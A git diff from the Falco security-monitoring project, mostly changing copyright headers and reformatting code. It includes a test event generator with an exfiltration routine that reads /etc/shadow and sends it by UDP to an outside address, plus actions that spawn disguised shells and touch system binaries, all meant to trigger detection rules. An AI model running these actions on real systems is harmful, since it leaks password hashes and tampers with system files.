diff --git a/.travis.yml b/.travis.yml index 157daaf9..5f71f2f0 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/CMakeCPackOptions.cmake b/CMakeCPackOptions.cmake index ec32740c..f10ff198 100644 --- a/CMakeCPackOptions.cmake +++ b/CMakeCPackOptions.cmake @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/CMakeLists.txt b/CMakeLists.txt index 8981e205..c2972156 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/cmake/modules/DownloadCatch.cmake b/cmake/modules/DownloadCatch.cmake index f1583b74..2495f3b9 100644 --- a/cmake/modules/DownloadCatch.cmake +++ b/cmake/modules/DownloadCatch.cmake @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2019 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of diff --git a/cmake/modules/DownloadFakeIt.cmake b/cmake/modules/DownloadFakeIt.cmake index 16067a14..962bc55f 100644 --- a/cmake/modules/DownloadFakeIt.cmake +++ b/cmake/modules/DownloadFakeIt.cmake @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2019 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of diff --git a/docker/dev/docker-entrypoint.sh b/docker/dev/docker-entrypoint.sh index d9db5c39..102951c6 100755 --- a/docker/dev/docker-entrypoint.sh +++ b/docker/dev/docker-entrypoint.sh @@ -1,8 +1,7 @@ #!/bin/bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/docker/event-generator/Makefile b/docker/event-generator/Makefile index 12fac349..6dfe9da4 100644 --- a/docker/event-generator/Makefile +++ b/docker/event-generator/Makefile @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/docker/event-generator/event_generator.cpp b/docker/event-generator/event_generator.cpp index 8d3e9533..c2cac231 100644 --- a/docker/event-generator/event_generator.cpp +++ b/docker/event-generator/event_generator.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include @@ -91,7 +88,6 @@ void open_file(const char *filename, const char *flags) { fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno)); } - } void exfiltration() @@ -110,7 +106,7 @@ void exfiltration() string line; string shadow_contents; - while (getline(shadow, line)) + while(getline(shadow, line)) { shadow_contents += line; shadow_contents += "\n"; @@ -125,13 +121,13 @@ void exfiltration() dest.sin_port = htons(8197); inet_aton("10.5.2.6", &(dest.sin_addr)); - if((rc = connect(sock, (struct sockaddr *) &dest, sizeof(dest))) != 0) + if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0) { fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno)); return; } - if ((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size()) + if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size()) { fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno)); return; @@ -174,7 +170,7 @@ void spawn(const char *cmd, char **argv, char **env) pid_t child; // Fork a process, that way proc.duration is reset - if ((child = fork()) == 0) + if((child = fork()) == 0) { execve(cmd, argv, env); fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno)); @@ -188,86 +184,97 @@ void spawn(const char *cmd, char **argv, char **env) void respawn(const char *cmd, const char *action, const char *interval) { - char *argv[] = {(char *) cmd, - (char *) "--action", (char *) action, - (char *) "--interval", (char *) interval, - (char *) "--once", NULL}; + char *argv[] = {(char *)cmd, + (char *)"--action", (char *)action, + (char *)"--interval", (char *)interval, + (char *)"--once", NULL}; char *env[] = {NULL}; spawn(cmd, argv, env); } -void write_binary_dir() { +void write_binary_dir() +{ printf("Writing to /bin/created-by-event-generator-sh...\n"); touch("/bin/created-by-event-generator-sh"); } -void write_etc() { +void write_etc() +{ printf("Writing to /etc/created-by-event-generator-sh...\n"); touch("/etc/created-by-event-generator-sh"); } -void read_sensitive_file() { +void read_sensitive_file() +{ printf("Reading /etc/shadow...\n"); read("/etc/shadow"); } -void read_sensitive_file_after_startup() { +void read_sensitive_file_after_startup() +{ printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n"); respawn("./httpd", "read_sensitive_file", "6"); } -void write_rpm_database() { +void write_rpm_database() +{ printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n"); touch("/var/lib/rpm/created-by-event-generator-sh"); } -void spawn_shell() { +void spawn_shell() +{ printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n"); int rc; - if ((rc = system("ls > /dev/null")) != 0) + if((rc = system("ls > /dev/null")) != 0) { fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno)); } } -void spawn_shell_under_httpd() { +void spawn_shell_under_httpd() +{ printf("Becoming the program \"httpd\" and then spawning a shell\n"); respawn("./httpd", "spawn_shell", "0"); } -void db_program_spawn_process() { +void db_program_spawn_process() +{ printf("Becoming the program \"mysql\" and then running ls\n"); respawn("./mysqld", "exec_ls", "0"); } -void modify_binary_dirs() { +void modify_binary_dirs() +{ printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n"); - if (rename("/bin/true", "/bin/true.event-generator-sh") != 0) + if(rename("/bin/true", "/bin/true.event-generator-sh") != 0) { fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno)); } else { - if (rename("/bin/true.event-generator-sh", "/bin/true") != 0) + if(rename("/bin/true.event-generator-sh", "/bin/true") != 0) { fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno)); } } } -void mkdir_binary_dirs() { +void mkdir_binary_dirs() +{ printf("Creating directory /bin/directory-created-by-event-generator-sh...\n"); - if (mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0) + if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0) { fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno)); } } -void change_thread_namespace() { +void change_thread_namespace() +{ printf("Calling setns() to change namespaces...\n"); printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n"); // It doesn't matter that the arguments to setns are @@ -276,12 +283,13 @@ void change_thread_namespace() { setns(0, 0); } -void system_user_interactive() { +void system_user_interactive() +{ pid_t child; printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n"); // Fork a child and do everything in the child. - if ((child = fork()) == 0) + if((child = fork()) == 0) { become_user("daemon"); char *argv[] = {(char *)"/bin/login", NULL}; @@ -296,7 +304,8 @@ void system_user_interactive() { } } -void network_activity() { +void network_activity() +{ printf("Connecting a udp socket to 10.2.3.4:8192...\n"); int rc; int sock = socket(PF_INET, SOCK_DGRAM, 0); @@ -306,7 +315,7 @@ void network_activity() { localhost.sin_port = htons(8192); inet_aton("10.2.3.4", &(localhost.sin_addr)); - if((rc = connect(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0) + if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0) { fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno)); return; @@ -315,18 +324,20 @@ void network_activity() { close(sock); } -void system_procs_network_activity() { +void system_procs_network_activity() +{ printf("Becoming the program \"sha1sum\" and then performing network activity\n"); respawn("./sha1sum", "network_activity", "0"); } -void non_sudo_setuid() { +void non_sudo_setuid() +{ pid_t child; printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n"); // Fork a child and do everything in the child. - if ((child = fork()) == 0) + if((child = fork()) == 0) { // First setuid to something non-root. Then try to setuid back to root. become_user("daemon"); @@ -340,7 +351,8 @@ void non_sudo_setuid() { } } -void create_files_below_dev() { +void create_files_below_dev() +{ printf("Creating /dev/created-by-event-generator-sh...\n"); touch("/dev/created-by-event-generator-sh"); } @@ -352,7 +364,8 @@ void exec_ls() spawn("/bin/ls", argv, env); } -void user_mgmt_binaries() { +void user_mgmt_binaries() +{ printf("Becoming the program \"vipw\" and then running the program /bin/ls\n"); printf("NOTE: does not result in a falco notification in containers\n"); respawn("./vipw", "exec_ls", "0"); @@ -393,11 +406,11 @@ void create_symlinks(const char *program) // sets up all the required symlinks. const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL}; - for (unsigned int i=0; progs[i] != NULL; i++) + for(unsigned int i = 0; progs[i] != NULL; i++) { unlink(progs[i]); - if ((rc = symlink(program, progs[i])) != 0) + if((rc = symlink(program, progs[i])) != 0) { fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno)); } @@ -406,9 +419,9 @@ void create_symlinks(const char *program) void run_actions(map &actions, int interval, bool once) { - while (true) + while(true) { - for (auto action : actions) + for(auto action : actions) { printf("***Action %s\n", action.first.c_str()); action.second(); @@ -431,14 +444,13 @@ int main(int argc, char **argv) map::iterator it; static struct option long_options[] = - { - {"help", no_argument, 0, 'h' }, - {"action", required_argument, 0, 'a' }, - {"interval", required_argument, 0, 'i' }, - {"once", no_argument, 0, 'o' }, + { + {"help", no_argument, 0, 'h'}, + {"action", required_argument, 0, 'a'}, + {"interval", required_argument, 0, 'i'}, + {"once", no_argument, 0, 'o'}, - {0, 0} - }; + {0, 0}}; // // Parse the args @@ -454,7 +466,7 @@ int main(int argc, char **argv) exit(1); case 'a': // "all" is already implied - if (strcmp(optarg, "all") != 0) + if(strcmp(optarg, "all") != 0) { if((it = defined_actions.find(optarg)) == defined_actions.end()) { @@ -477,8 +489,8 @@ int main(int argc, char **argv) } // - // Also look for actions in the environment. If specified, they - // override any specified on the command line. + // Also look for actions in the environment. If specified, they + // override any specified on the command line. // char *env_action = getenv("EVENT_GENERATOR_ACTIONS"); @@ -489,7 +501,7 @@ int main(int argc, char **argv) string envs(env_action); istringstream ss(envs); string item; - while (std::getline(ss, item, ':')) + while(std::getline(ss, item, ':')) { if((it = defined_actions.find(item)) == defined_actions.end()) { @@ -514,7 +526,7 @@ int main(int argc, char **argv) setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // Only create symlinks when running as the program event_generator - if (strstr(argv[0], "generator")) + if(strstr(argv[0], "generator")) { create_symlinks(argv[0]); } diff --git a/docker/local/docker-entrypoint.sh b/docker/local/docker-entrypoint.sh index d9db5c39..102951c6 100755 --- a/docker/local/docker-entrypoint.sh +++ b/docker/local/docker-entrypoint.sh @@ -1,8 +1,7 @@ #!/bin/bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/docker/rhel/docker-entrypoint.sh b/docker/rhel/docker-entrypoint.sh index d9db5c39..102951c6 100755 --- a/docker/rhel/docker-entrypoint.sh +++ b/docker/rhel/docker-entrypoint.sh @@ -1,8 +1,7 @@ #!/bin/bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/docker/stable/docker-entrypoint.sh b/docker/stable/docker-entrypoint.sh index d9db5c39..102951c6 100755 --- a/docker/stable/docker-entrypoint.sh +++ b/docker/stable/docker-entrypoint.sh @@ -1,8 +1,7 @@ #!/bin/bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/examples/mitm-sh-installer/web_root/install-software.sh b/examples/mitm-sh-installer/web_root/install-software.sh index 1c0dbf44..2a36b0d6 100644 --- a/examples/mitm-sh-installer/web_root/install-software.sh +++ b/examples/mitm-sh-installer/web_root/install-software.sh @@ -1,8 +1,7 @@ #!/bin/bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/falco.yaml b/falco.yaml index 2ebacd12..d339cb18 100644 --- a/falco.yaml +++ b/falco.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -185,4 +184,4 @@ grpc: # By default it is off. # By enabling this all the output events will be kept in memory until you read them with a gRPC client. grpc_output: - enabled: false \ No newline at end of file + enabled: false diff --git a/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb b/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb index e1c085a0..c20fc366 100644 --- a/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb +++ b/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb @@ -3,9 +3,8 @@ #### # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/rules/CMakeLists.txt b/rules/CMakeLists.txt index 25be6731..4817eae0 100644 --- a/rules/CMakeLists.txt +++ b/rules/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/rules/application_rules.yaml b/rules/application_rules.yaml index 6d19a203..a95f9fb8 100644 --- a/rules/application_rules.yaml +++ b/rules/application_rules.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/rules/falco_rules.local.yaml b/rules/falco_rules.local.yaml index d4b619ab..f1811a4c 100644 --- a/rules/falco_rules.local.yaml +++ b/rules/falco_rules.local.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/rules/falco_rules.yaml b/rules/falco_rules.yaml index 1c9e6b0a..c26552b7 100644 --- a/rules/falco_rules.yaml +++ b/rules/falco_rules.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/rules/k8s_audit_rules.yaml b/rules/k8s_audit_rules.yaml index f8ca043f..b9377172 100644 --- a/rules/k8s_audit_rules.yaml +++ b/rules/k8s_audit_rules.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/CMakeLists.txt b/scripts/CMakeLists.txt index fbec666c..fd8bd320 100644 --- a/scripts/CMakeLists.txt +++ b/scripts/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/build-lpeg.sh b/scripts/build-lpeg.sh index 9ae5ac71..6f924d88 100755 --- a/scripts/build-lpeg.sh +++ b/scripts/build-lpeg.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/debian/falco b/scripts/debian/falco index e8a59f6c..22b10f91 100755 --- a/scripts/debian/falco +++ b/scripts/debian/falco @@ -1,8 +1,7 @@ #! /bin/sh # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/debian/postinst.in b/scripts/debian/postinst.in index 5eb61bbb..a72889bd 100755 --- a/scripts/debian/postinst.in +++ b/scripts/debian/postinst.in @@ -1,8 +1,7 @@ #!/bin/sh # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/debian/postrm b/scripts/debian/postrm index dff7ba40..1dd2783d 100755 --- a/scripts/debian/postrm +++ b/scripts/debian/postrm @@ -1,8 +1,7 @@ #!/bin/sh # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/debian/prerm.in b/scripts/debian/prerm.in index 0e000c46..62625c5e 100755 --- a/scripts/debian/prerm.in +++ b/scripts/debian/prerm.in @@ -1,8 +1,7 @@ #!/bin/sh # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/ignored-calls.sh b/scripts/ignored-calls.sh index 785479d1..4d8ea330 100755 --- a/scripts/ignored-calls.sh +++ b/scripts/ignored-calls.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/rpm/falco b/scripts/rpm/falco index 6eeaeb8d..4ea6ce46 100755 --- a/scripts/rpm/falco +++ b/scripts/rpm/falco @@ -1,9 +1,8 @@ #!/bin/sh # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/rpm/postinstall b/scripts/rpm/postinstall index bf92abd0..f205c644 100755 --- a/scripts/rpm/postinstall +++ b/scripts/rpm/postinstall @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/rpm/postuninstall b/scripts/rpm/postuninstall index 242b0866..1d0f6809 100755 --- a/scripts/rpm/postuninstall +++ b/scripts/rpm/postuninstall @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/scripts/rpm/preuninstall b/scripts/rpm/preuninstall index 93856466..8990662d 100755 --- a/scripts/rpm/preuninstall +++ b/scripts/rpm/preuninstall @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/confs/file_output.yaml b/test/confs/file_output.yaml index 28718d83..44a24e81 100644 --- a/test/confs/file_output.yaml +++ b/test/confs/file_output.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/confs/program_output.yaml b/test/confs/program_output.yaml index dc370d46..81e66796 100644 --- a/test/confs/program_output.yaml +++ b/test/confs/program_output.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/cpu_monitor.sh b/test/cpu_monitor.sh index e741caf3..ead977fc 100644 --- a/test/cpu_monitor.sh +++ b/test/cpu_monitor.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/falco_k8s_audit_tests.yaml b/test/falco_k8s_audit_tests.yaml index da6cec0e..03576382 100644 --- a/test/falco_k8s_audit_tests.yaml +++ b/test/falco_k8s_audit_tests.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -514,4 +513,4 @@ trace_files: !mux - ../rules/k8s_audit_rules.yaml detect_counts: - K8s Role/Clusterrolebinding Deleted: 1 - trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json \ No newline at end of file + trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json diff --git a/test/falco_test.py b/test/falco_test.py index 2a209593..1d1274f9 100644 --- a/test/falco_test.py +++ b/test/falco_test.py @@ -1,8 +1,7 @@ #!/usr/bin/env python # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/falco_tests_package.yaml b/test/falco_tests_package.yaml index 7cc9e464..d07917a3 100644 --- a/test/falco_tests_package.yaml +++ b/test/falco_tests_package.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/falco_traces.yaml.in b/test/falco_traces.yaml.in index fb43a8fd..bfc146b1 100644 --- a/test/falco_traces.yaml.in +++ b/test/falco_traces.yaml.in @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/plot-live.r b/test/plot-live.r index 934b0a1a..faa909db 100644 --- a/test/plot-live.r +++ b/test/plot-live.r @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/plot-traces.r b/test/plot-traces.r index 08feec25..03d5188c 100644 --- a/test/plot-traces.r +++ b/test/plot-traces.r @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/append_single_rule.yaml b/test/rules/append_single_rule.yaml index 0e946c57..a08e3ce7 100644 --- a/test/rules/append_single_rule.yaml +++ b/test/rules/append_single_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/catchall_order.yaml b/test/rules/catchall_order.yaml index f8c44522..c402ff73 100644 --- a/test/rules/catchall_order.yaml +++ b/test/rules/catchall_order.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/detect_connect_using_in.yaml b/test/rules/detect_connect_using_in.yaml index 8d9fcf63..5e4b4dcf 100644 --- a/test/rules/detect_connect_using_in.yaml +++ b/test/rules/detect_connect_using_in.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/double_rule.yaml b/test/rules/double_rule.yaml index 22bffac8..e70e40f0 100644 --- a/test/rules/double_rule.yaml +++ b/test/rules/double_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -27,4 +26,4 @@ desc: A process named cat does an access condition: evt.type=access and is_cat output: "An access was seen (command=%proc.cmdline)" - priority: INFO \ No newline at end of file + priority: INFO diff --git a/test/rules/empty_rules.yaml b/test/rules/empty_rules.yaml index 56ce1880..d31632e6 100644 --- a/test/rules/empty_rules.yaml +++ b/test/rules/empty_rules.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/endswith.yaml b/test/rules/endswith.yaml index d5fc5999..88223325 100644 --- a/test/rules/endswith.yaml +++ b/test/rules/endswith.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -19,4 +18,4 @@ desc: A file ending with null is opened condition: evt.type=open and fd.name endswith null output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/engine_version_mismatch.yaml b/test/rules/engine_version_mismatch.yaml index e940bde4..b0da465c 100644 --- a/test/rules/engine_version_mismatch.yaml +++ b/test/rules/engine_version_mismatch.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -31,4 +30,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/falco_rules_warnings.yaml b/test/rules/falco_rules_warnings.yaml index 3848e839..ba44d971 100644 --- a/test/rules/falco_rules_warnings.yaml +++ b/test/rules/falco_rules_warnings.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/invalid_engine_version_not_number.yaml b/test/rules/invalid_engine_version_not_number.yaml index fa77b4a5..16cd70c5 100644 --- a/test/rules/invalid_engine_version_not_number.yaml +++ b/test/rules/invalid_engine_version_not_number.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -31,4 +30,4 